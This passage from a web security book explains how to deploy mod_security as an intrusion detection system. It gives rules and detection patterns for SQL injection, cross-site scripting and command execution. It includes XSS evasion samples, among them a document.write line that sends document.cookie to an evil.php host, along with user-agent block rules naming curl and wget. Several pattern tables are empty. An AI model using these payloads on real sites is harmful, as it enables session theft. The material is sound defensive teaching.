In principle, IDSs support various ways to notify you of the problems they discover. In the best-case scenario, you have some kind of monitoring system to plug the IDS into. If you do not, you will probably end up devising some way to send notifications to your email, which is a bad way to handle notifications. Everyone’s natural reaction to endless email messages from an IDS is to start ignoring them or to filter them automatically into a separate mail folder.
A better approach (see Chapter 8) is to streamline IDS requests into the error log and to implement daily reporting at one location for everything that happens with the web server. That way, when you come to work in the morning, you only have one email message to examine. You may decide to keep email notifications for some dangerous attacks—e.g., SQL injections.
Deploying a web firewall for a known system requires planning and careful execution. It consists of the following steps:
Learn about what you are protecting.
Decide whether an IDS is the correct choice.
Choose the IDS tool you want to deploy. This step is usually done in parallel with the next step since not all tools support all features.
Establish security policy. That is, decide what should be allowed and how you are going to respond to violations.
Install and configure the IDS tool (on a development server).
Deploy in detection mode. That is, just log violations and do not reject requests.
Monitor the implementation, react to alerts, and refine configuration to reduce false positives.
Optionally, upgrade some or all rules to the prevention mode, whereby requests that match some or all of the rules are rejected.
Probably the best advice I can give is for you to learn about the system you want
to protect. I am asked all the time to provide an example of a tight
mod_security
configuration, but I hesitate and almost never
do. Intrusion detection (like many other security techniques) is not a simple,
fire-and-forget, solution in spite of what some commercial vendors say. Incorrect
rules, when deployed, will result in false positives that waste analysts’ time. When
used in prevention mode, false positives result in reduced system availability,
which translates to lost revenue (or increased operations expenses, depending on the
way you look at it).
In step 2, you need to decide whether intrusion detection can bring a noticeable increase in security. This is not the same as what I previously discussed in this chapter, that is, whether intrusion detection is a valid tool at all. Here, the effort of introducing intrusion detection needs to be weighed against other ways to solve the problem. First, understand the time commitment intrusion detection requires. If you cannot afford to follow up on all alerts produced by the system and to work continuously to tweak and improve the configuration, then you might as well give up now. The other thing to consider is the nature and the size of the system you want to protect. For smaller applications for which you have the source code, invest in a code review and fix the problems in the source code.
Establishing a protection policy is arguably the most difficult part of the work. You start with the list of weaknesses you want to protect and, having in mind the capabilities of the protection software, work out a feasible protection plan. If it turns out the tool is not capable enough, you may look for a better tool. Work on the policy is similar to the process of threat modeling discussed in Chapter 1.
Installation and configuration is the easy part and already covered in detail
here. You need to work within the constraints of your selected tool to implement the
previously designed policy. The key to performing this step is to work on a
development server first and to test the configuration thoroughly to ensure the
protection rules behave as you would expect them to. In the
mod_security
distribution is a tool (
run_test.pl
) that can be used for automated tests.
As a low-level tool, run_test.pl
takes a previously created
HTTP request from a text file, sends it to the server, and examines the status code
of the response to determine the operation’s success. Run regression tests
periodically to test your IDS.
Deploying in detection mode only is what you do to test the configuration in real life in an effort to avoid causing disturbance to normal system operation. For several weeks, the IDS should only send notifications without interrupting the requests. The configuration should then be fine-tuned to reduce the false positives rate, hopefully to zero. Once you are confident the protection is well designed (do not hurry), the system operation mode can be changed to prevention mode. I prefer to use the prevention mode only for problems I know I have. In all other cases, run in the detection mode at least for some time and see if you really have the problems you think you may have.
Using only detection capabilities of the intrusion detection software is fine, provided someone will examine the alerts on a regular basis. Rejecting certain hacking attempts straight away may force the attacker to seek other evasion methods, which may be successful (that is where the attackers have the advantage). Letting them through allows you to record their attacks and subsequently close the hole.
There is a set of rules I normally use as a starting point in addition to the basic configuration given earlier. These rules are not meant to protect from direct attacks but rather to enforce strict HTTP protocol usage and make it more difficult for attackers to make manual attacks. As I warned, these rules may not be suitable for all situations. If you are running a public web site, there will be all sorts of visitors, including search engines, which may be a little bit eccentric in the way they send HTTP requests that are normal. Tight configurations usually work better in closed environments.
# Accept only valid protocol versions, helps # fight HTTP fingerprinting. SecFilterSelective SERVER_PROTOCOL !^HTTP/(0\.9|1\.0|1\.1)$ # Allow supported request methods only. SecFilterSelective REQUEST_METHOD !^(GET|HEAD|POST)$ # Require the Host header field to be present. SecFilterSelective HTTP_Host ^$ # Require explicit and known content encodings for methods # other than GET or HEAD. The multipart/form-data encoding # should not be allowed at all if the application does not # make use of file upload. There are many automated attacks # out there that are using wrong encoding names. SecFilterSelective REQUEST_METHOD !^(GET|HEAD)$ chain SecFilterSelective HTTP_Content-Type \ !(^application/x-www-form-urlencoded$|^multipart/form-data;) # Require Content-Length to be provided with # every POST request. Length is a requirement for # request body filtering to work. SecFilterSelective REQUEST_METHOD ^POST$ chain SecFilterSelective HTTP_Content-Length ^$ # Don't accept transfer encodings we know we don't handle # (you probably don't need them anyway). SecFilterSelective HTTP_Transfer-Encoding !^$
You may also choose to add some of the following rules to warn you of requests that do not seem to be from common browsers. Rules such as these are suited for applications where the only interaction is expected to come from users using browsers. On a public web site, where many different types of user agents are active, they result in too many warnings.
# Most requests performed manually (e.g., using telnet or nc) # will lack one of the following headers. # (Accept-Encoding and Accept-Language are also good # candidates for monitoring since popular browsers # always use them.) SecFilterSelective HTTP_User-Agent|HTTP_Connection|HTTP_Accept ^$ log,pass # Catch common nonbrowser user agents. SecFilterSelective HTTP_User-Agent \ (libwhisker|paros|wget|libwww|perl|curl) log,pass
Ironically, your own monitoring tools are likely to generate error log warnings. If you have a dedicated IP address from which you perform monitoring, you can add a rule to skip the warning checks for all requests coming from it. Put the following rule just above the rules that produce warnings:
# Allow requests coming from 192.168.254.125 SecFilterSelective REMOTE_ADDR ^192.168.254.125$ allow
Though you could place this rule on the top of the rule set, that is a bad idea; as one of the basic security principles says, only establish minimal trust.
Web IDSs are good at enforcing strict protocol usage and defending against known application problems. Attempts to exploit common web application problems often have a recognizable footprint. Pattern matching can be used to detect some attacks but it is generally impossible to catch all of them without having too many false positives. Because of this, my advice is to use detection only when dealing with common web application attacks. There is another reason to adopt this approach: since it is not possible to have a foolproof defense against a determined attacker, having a tight protection scheme will force such an attacker to adopt and use evasion methods you have not prepared for. If that happens, the attacker will become invisible to you. Let some attacks through so you are aware of what is happening.
The biggest obstacle to reliable detection is the ability for users to enter free-form text, and this is common in web applications. Consequently, content management systems are the most difficult ones to defend. (Users may even be discussing web application security in a forum!) When users are allowed to enter arbitrary text, they will sooner or later attempt to enter something that looks like an attack.
In this section, I will discuss potentially useful regular expression patterns
without going into details as to how they are to be added to the
mod_security
configuration since the method of adding
patterns to rules has been described. (If you are not familiar with common web
application attacks, reread Chapter 10.) In
addition to the patterns provided here, you can seek inspiration in rules others
have created for nonweb IDSs. (For example, rules for Snort, a popular NIDS, can be
found at http://www.snort.org
and http://www.bleedingsnort.com
.)
Database attacks are executed by sneaking an SQL query or a part of it into request parameters. Attack detection must, therefore, attempt to detect commonly used SQL keywords and metacharacters. Table 12-4 shows a set of patterns that can be used to detect database attacks.
Table 12-4. Patterns to detect SQL injection attacks
Pattern |
Query example |
---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
Appends to an existing query: |
|
Attempt to modify the original query to always be true:
|
’ |
Attempt to escape out of a string and inject a query, and
then comment out the rest of the original query:
|
SQL injection attacks are a work of trial and error. It is almost impossible to execute a successful attack on the first try. It is more likely the attacker will make errors as he learns about database layout table contents. Each error will cause an SQL query somewhere to fail, in turn causing the script to fail, too. Watching for failed queries in the application log will make SQL injection attack detection a reality. If the application was not designed to log such problems, it may still be possible to use output buffering to detect them (using patterns to look for error messages) and log them into the web server error log.
So far, I have presented generic SQL patterns. Most databases have proprietary extensions of one kind or another, which require keywords that are often easier to detect. These patterns differ from one database to another, so creating a good set of detection rules requires expertise in the deployed database. Table 12-5 shows some interesting patterns for MSSQL and MySQL.
Table 12-5. Database-specific detection patterns
Pattern |
Attack |
---|---|
|
MSSQL. Attempt to execute an extended stored procedure:
|
|
MSSQL. Attempt to execute a stored procedure:
|
|
MSSQL. Access to an internal variable:
|
|
MySQL. Attempt to write contents of a table to disk:
|
|
MySQL. Attempt to load a file from disk:
|
Cross-site scripting (XSS) attacks can be difficult to detect when launched by those who know how to evade detection systems. If the entry point is in the HTML, the attacker must find a way to change from HTML and into something more dangerous. Danger comes from JavaScript, ActiveX components, Flash programs, or other embedded objects. The following list of problematic HTML tags is by no means exhaustive, but it will prove the point:
<object>...</object>
Executes component when page is loaded (IE only)
<embed>...</embed>
Executes component when page is loaded
<applet>...</applet>
Executes applet when page is loaded
<script>...</script>
Executes code when page is loaded
<script src="..."></script>
Executes code when page is loaded
<iframe src="...">
Executes code when page is loaded
<img src="javascript:...">
Executes code when page is loaded
<b
onMouseOver="...">
Executes code when mouse pointer covers the bold text
&{...};
Executes code when page is loaded (Netscape only)
Your best bet is to try to detect any HTML in the parameters and also the
special JavaScript entity syntax that only works in Netscape. If a broad pattern
such as <.+>
is too broad for you, you may want to list
all possible tag names and detect them. But if the attacker can sneak in a tag,
then detection becomes increasingly difficult because of many evasion techniques
that can be used. From the following two evasion examples, you can see it is
easy to obfuscate a string to make detection practically impossible:
<img src="javascript:...">
<img
src="javas
X
cript:...">
(X
is any of the whitespace characters
except space)
If the attacker can inject content directly into JavaScript, the list of
evasion options is even longer. For example, he can use the eval(
)
function to execute an arbitrary string or the
document.write()
function to output HTML into the
document:
document.write('<img
src="http://www.example.com/evil.php?
’
+
document.cookie
+
’">')
eval('alert(document.cookie)')
eval('al' + 'ert' + '(docu' + 'ment' + '.' + 'co' + 'ok' +
'ie)')
eval('\x61\x6C\x65\x72\x74\x28\x64\x6F\x63\x75\x6D\x65
’
+
’\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29')
Now you understand why you should not stop attackers too early. Knowing you are being attacked, even successfully attacked, is sometimes better than not knowing at all. A useful collection list of warning patterns for XSS attacks is given in Table 12-6. (I call them warning patterns because you probably do not want to automatically reject requests with such patterns.) They are not foolproof but cast a wide net to catch potential abuse. You may have to refine it over time to reduce false positives for your particular application.
Table 12-6. XSS attack warning patterns
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Detecting command execution and file disclosure attacks in the input data can be difficult. The commands are often very short and can appear as normal words in many request parameters. The recommended course of action is to implement a set of patterns to detect but not reject requests. Table 12-7 shows patterns that can be of use. (I have combined many patterns into one to save space.) The patterns in the table are too broad and should never be used to reject requests automatically.
Table 12-7. Command execution and file disclosure detection patterns
Pattern |
Description |
---|---|
|
Common Unix commands |
|
Fragments of common Unix system path |
|
Directory backreference commonly used as part of file disclosure attacks |
Command execution and file disclosure attacks are often easier to detect in
the output. On my system, the first line of /etc/passwd
contains “root:x:0:0:root:/root:/bin/bash,” and this is the file any attacker is
likely to examine. A pattern such as root:x:0:0:root
is
likely to work here. Similarly, the output of the id
command looks like this:
uid=506(ivanr) gid=506(ivanr) groups=506(ivanr)
A pattern such as uid=[[:digit:]]+\([[:alnum:]]+\)
gid=\[[:digit:]]\([[:alnum:]]+\)
will catch its use by
looking at the output.
I conclude this chapter with a few advanced topics. These topics are regularly the
subject of email messages I get about mod_security
on the users’
mailing list.
The mod_security
configuration data can be placed into any
Apache context. This means you can configure it in the main server, virtual
hosts, directories, locations, and file matches. It can even work in the
.htaccess
files context. Whenever a subcontext is
created, it automatically inherits the configuration and all the rules from the
parent context. Suppose you have the following:
SecFilterSelective ARG_p KEYWORD <Location /moresecure/> SecFilterSelective ARG_q KEYWORD </Location>
Requests for the parent configuration will have only parameter
p
tested, while the requests that fall in the
/moresecure/
location will have p
and q
tested (in that order). This makes it easy to add more
protection. If you need less protection, you can choose not to inherit any of
the rules from the parent context. You do this with the
SecFilterInheritance
directive. For example, suppose you have:
SecFilterSelective ARG_p KEYWORD <Location /moresecure/> SecFilterInheritance Off SecFilterSelective ARG_q KEYWORD </Location>
Requests for the parent configuration will have only parameter
p
tested, while the requests that fall in the
/moresecure/
location will have only parameter
q
tested. The SecFilterInheritance
directive affects only rule inheritance. The rest of the configuration is still
inherited, but you can use the configuration directives to change configuration
at will.
Byte-range restriction is a special type of protection that aims to reduce the
possibility of a full range of bytes in the request parameters. Such protection
can be effective against buffer overflow attacks against vulnerable binaries.
The built-in protection, if used, will validate that every variable used in a
rule conforms to the range specified with the
SecFilterForceByteRange
directive. Applications
built for an English-speaking audience will probably use a part of the ASCII
set. Restricting all bytes to have values from 32 to 126 will not prevent normal
functionality:
SecFilterForceByteRange 32 126
However, many applications do need to allow 0x0a
and
0x0d
bytes (line feed and carriage return, respectfully)
because these characters are used in free-form fields (ones with a
<textarea>
tag). Though you can relax the range
slightly to allow byte values from 10 on up, I am often asked whether it is
possible to have more than one range. The
SecFilterForceByteRange
directive does not yet support
that, but you could perform such a check with a rule that sits at the beginning
of the rule set.
SecFilterSelective ARGS !^[\x0a\x0d\x20-\x7e]*$
The previous rule allows characters 0x0a
,
0x0d
, and a range from 0x20
(32) to
0x7e
(126).
Since mod_security
understands the
multipart/form-data
encoding used for file uploads, it
can extract the uploaded files from the request and store them for future
reference. In a way, this is a form of audit logging (see Chapter 8). mod_security
offers another exciting feature: validation of uploaded files in real time. All
you need is a script designed to take the full path to the file as its first and
only parameter and to enable file validation functionality in
mod_security
:
SecUploadApproveScript /usr/local/apache/bin/upload_verify.pl
The script will be invoked for every file upload attempt. If the script
returns 1
as the first character of the first line of its
output, the file will be accepted. If it returns anything else, the whole
request will be rejected. It is useful to have the error message (if any) on the
same line after the first character as it will be printed in the
mod_security
log. File upload validation can be used for
several purposes:
To inspect uploaded files for viruses or other types of attack
To allow only files of certain types (e.g., images)
To inspect and validate file content
If you have the excellent open source antivirus program
Clam AntiVirus (http://www.clamav.net
) installed, then you can use the
following utility script as an interface:
#!/usr/bin/perl $CLAMSCAN = "/usr/bin/clamscan"; if (@ARGV != 1) { print "Usage: modsec-clamscan.pl <filename>\n"; exit; } my ($FILE) = @ARGV; $cmd = "$CLAMSCAN --stdout --disable-summary $FILE"; $input = `$cmd`; $input =~ m/^(.+)/; $error_message = $1; $output = "0 Unable to parse clamscan output"; if ($error_message =~ m/: Empty file\.$/) { $output = "1 empty file"; } elsif ($error_message =~ m/: (.+) ERROR$/) { $output = "0 clamscan: $1"; } elsif ($error_message =~ m/: (.+) FOUND$/) { $output = "0 clamscan: $1"; } elsif ($error_message =~ m/: OK$/) { $output = "1 clamscan: OK"; } print "$output\n";
When mod_security
operates from within Apache (as opposed
to working as a network gateway), it can obtain more information about requests.
One useful bit of information is the choice of a module to handle the request
(called a handler). In the early phases of request
processing, Apache will look for candidate modules to handle the request,
usually by looking at the extension of the targeted file. If a handler is not
found, the request is probably for a static file (e.g., an image). Otherwise,
the handler will probably process the file in some way (for example, executing
the script in the case of PHP) and dynamically create a response. Since
mod_security
mostly serves the purpose of protecting
dynamic resources, this information can be used to perform optimization. If you
configure the SecFilterEngine
directive with the
DynamicOnly
parameter then
mod_security
will act only on those requests that have a
handler attached to them.
# Only process dynamic requests SecFilterEngine DynamicOnly
Unfortunately, it is possible to configure Apache to serve dynamic content and
have the handler undefined, by misusing its
AddType
directive. Even the official PHP
installation guide recommends this approach. If that happens,
mod_security
will not be able to determine which requests
are truly dynamic and will not be able to protect them. The correct approach is
to use the
AddHandler
directive, as in this example for
PHP:
AddHandler application/x-httpd-php .php
Relying on the existence of a request handler to decide whether to protect a
resource can be rewarding, but since it can be dangerous if handlers are not
configured correctly, check if relying on handlers really works in your case.
You can do this by having a rule that rejects every request (in which case it
will be obvious whether mod_security
works) or by looking at
what mod_security
writes to the debug log (where it will
state if it believes the incoming request is for a static resource).
There are two ways to control request body buffering and monitoring. You have
seen one in the default configuration where the
SecFilterScanPOST
directive was used. This works
if you know in advance where you want and do not want buffering to take place.
Using the Apache context directives, you can turn off buffering for some parts
of the site, as in the following example:
# Turn off POST buffering for # scripts in this location <Location /nobuffering/> SecFilterScanPOST Off </Location>
Sometimes you need to disable buffering on a per-request basis, based on some
request attribute. This is possible. If mod_security
detects
that the MODSEC_NOPOSTBUFFERING
environment variable is
defined, it will not read in the request body. The environment variable can be
defined with the help of the mod_setenvif
module and its
SetEnvIf
directive:
# Disable request body buffering for all file uploads SetEnvIfNoCase Content-Type ^multipart/form-data \ "MODSEC_NOPOSTBUFFERING=Do not buffer file uploads"
The text you assign to the variable will appear in the debug log, to make it
clear why the request body was not buffered. Turning off buffering like this can
result in removing protection from your scripts. If the attacker finds out how
to disable request body buffering, he may be able to do so for every script and
then use the POST
method for all attacks.
Response body monitoring is supported in the Apache 2 version of
mod_security
and can prevent information leak or detect
signs of intrusion. This type of filtering needs to be enabled first because it
is off by default:
# Enable output filtering SecFilterScanOutput On # Restrict output filtering to text-based pages SecFilterOutputMimeTypes "(null) text/plain text/html"
It is important to restrict filtering using MIME types to avoid binary
resources, such as images, from being buffered and analyzed. The
SecFilterSelective
keyword is used against the
OUTPUT
variable to monitor response bodies. The following
example watches pages for PHP errors:
SecFilterSelective OUTPUT "Fatal Error:"
Using a trick conceived by Ryan C. Barnett (some of whose work is available at
https://sourceforge.net/users/rcbarnett/
), output monitoring can
be used as a form of integrity monitoring to detect and protect against
defacement attacks. Attackers performing defacement usually replace the complete
home page with their content. To fight this, Ryan embeds a unique keyword into
every page and creates an output filtering rule that only allows the page to be
sent if it contains the keyword.
SecFilterSelective OUTPUT !KEYWORD
This is not recommended for most applications due to its organizational overhead and potential for errors, but it can work well in a few high-profile cases.
Though most of this chapter used negative security model protection for
examples, you can deploy mod_security
in a positive security
model configuration. A positive security model relies on identifying requests
that are safe instead of looking for dangerous content. In the following
example, I will demonstrate how this approach can be used by showing the
configuration for two application scripts. For each script, the standard Apache
container directive <Location>
is used to enclose
mod_security
rules that will only be applied to that
script. The use of the SecFilterSelective
directive to
specify rules has previously been described.
<Location /user_view.php> # This script only accepts GET SecFilterSelective REQUEST_METHOD !^GET$ # Accept only one parameter: id SecFilterSelective ARGS_NAMES !^id$ # Parameter id is mandatory, and it must be # a number, 4-14 digits long SecFilterSelective ARG_id !^[[:digit:]]{4,14}$ </Location> <Location /user_add.php> # This script only accepts POST SecFilterSelective REQUEST_METHOD !^POST$ # Accept three parameters: firstname, lastname, and email SecFilterSelective ARGS_NAMES !^(firstname|lastname|email)$ # Parameter firstname is mandatory, and it must # contain text 1-64 characters long SecFilterSelective ARG_firstname !^[[:alnum:][:space:]]{1,64}$ # Parameter lastname is mandatory, and it must # contain text 1-64 characters long SecFilterSelective ARG_lastname !^[ [:alnum:][:space:]]{1,64}$ # Parameter email is optional, but if it is present # it must consist only of characters that are # allowed in an email address SecFilterSelective ARG_email !(^$|^[[:alnum:].@]{1,64}$) </Location>
There is a small drawback to this configuration approach. To determine which
<Location>
block is applicable for a request,
Apache has to look through all such directives present. For applications with a
small number of scripts, this will not be a problem, but it may present a
performance problem for applications with hundreds of scripts, each of which
need a <Location>
block.
A feature to allow user-defined types (predefined regular expressions), such
as one present in mod_parmguard
(see the sidebar), would
significantly ease the task of writing configuration data.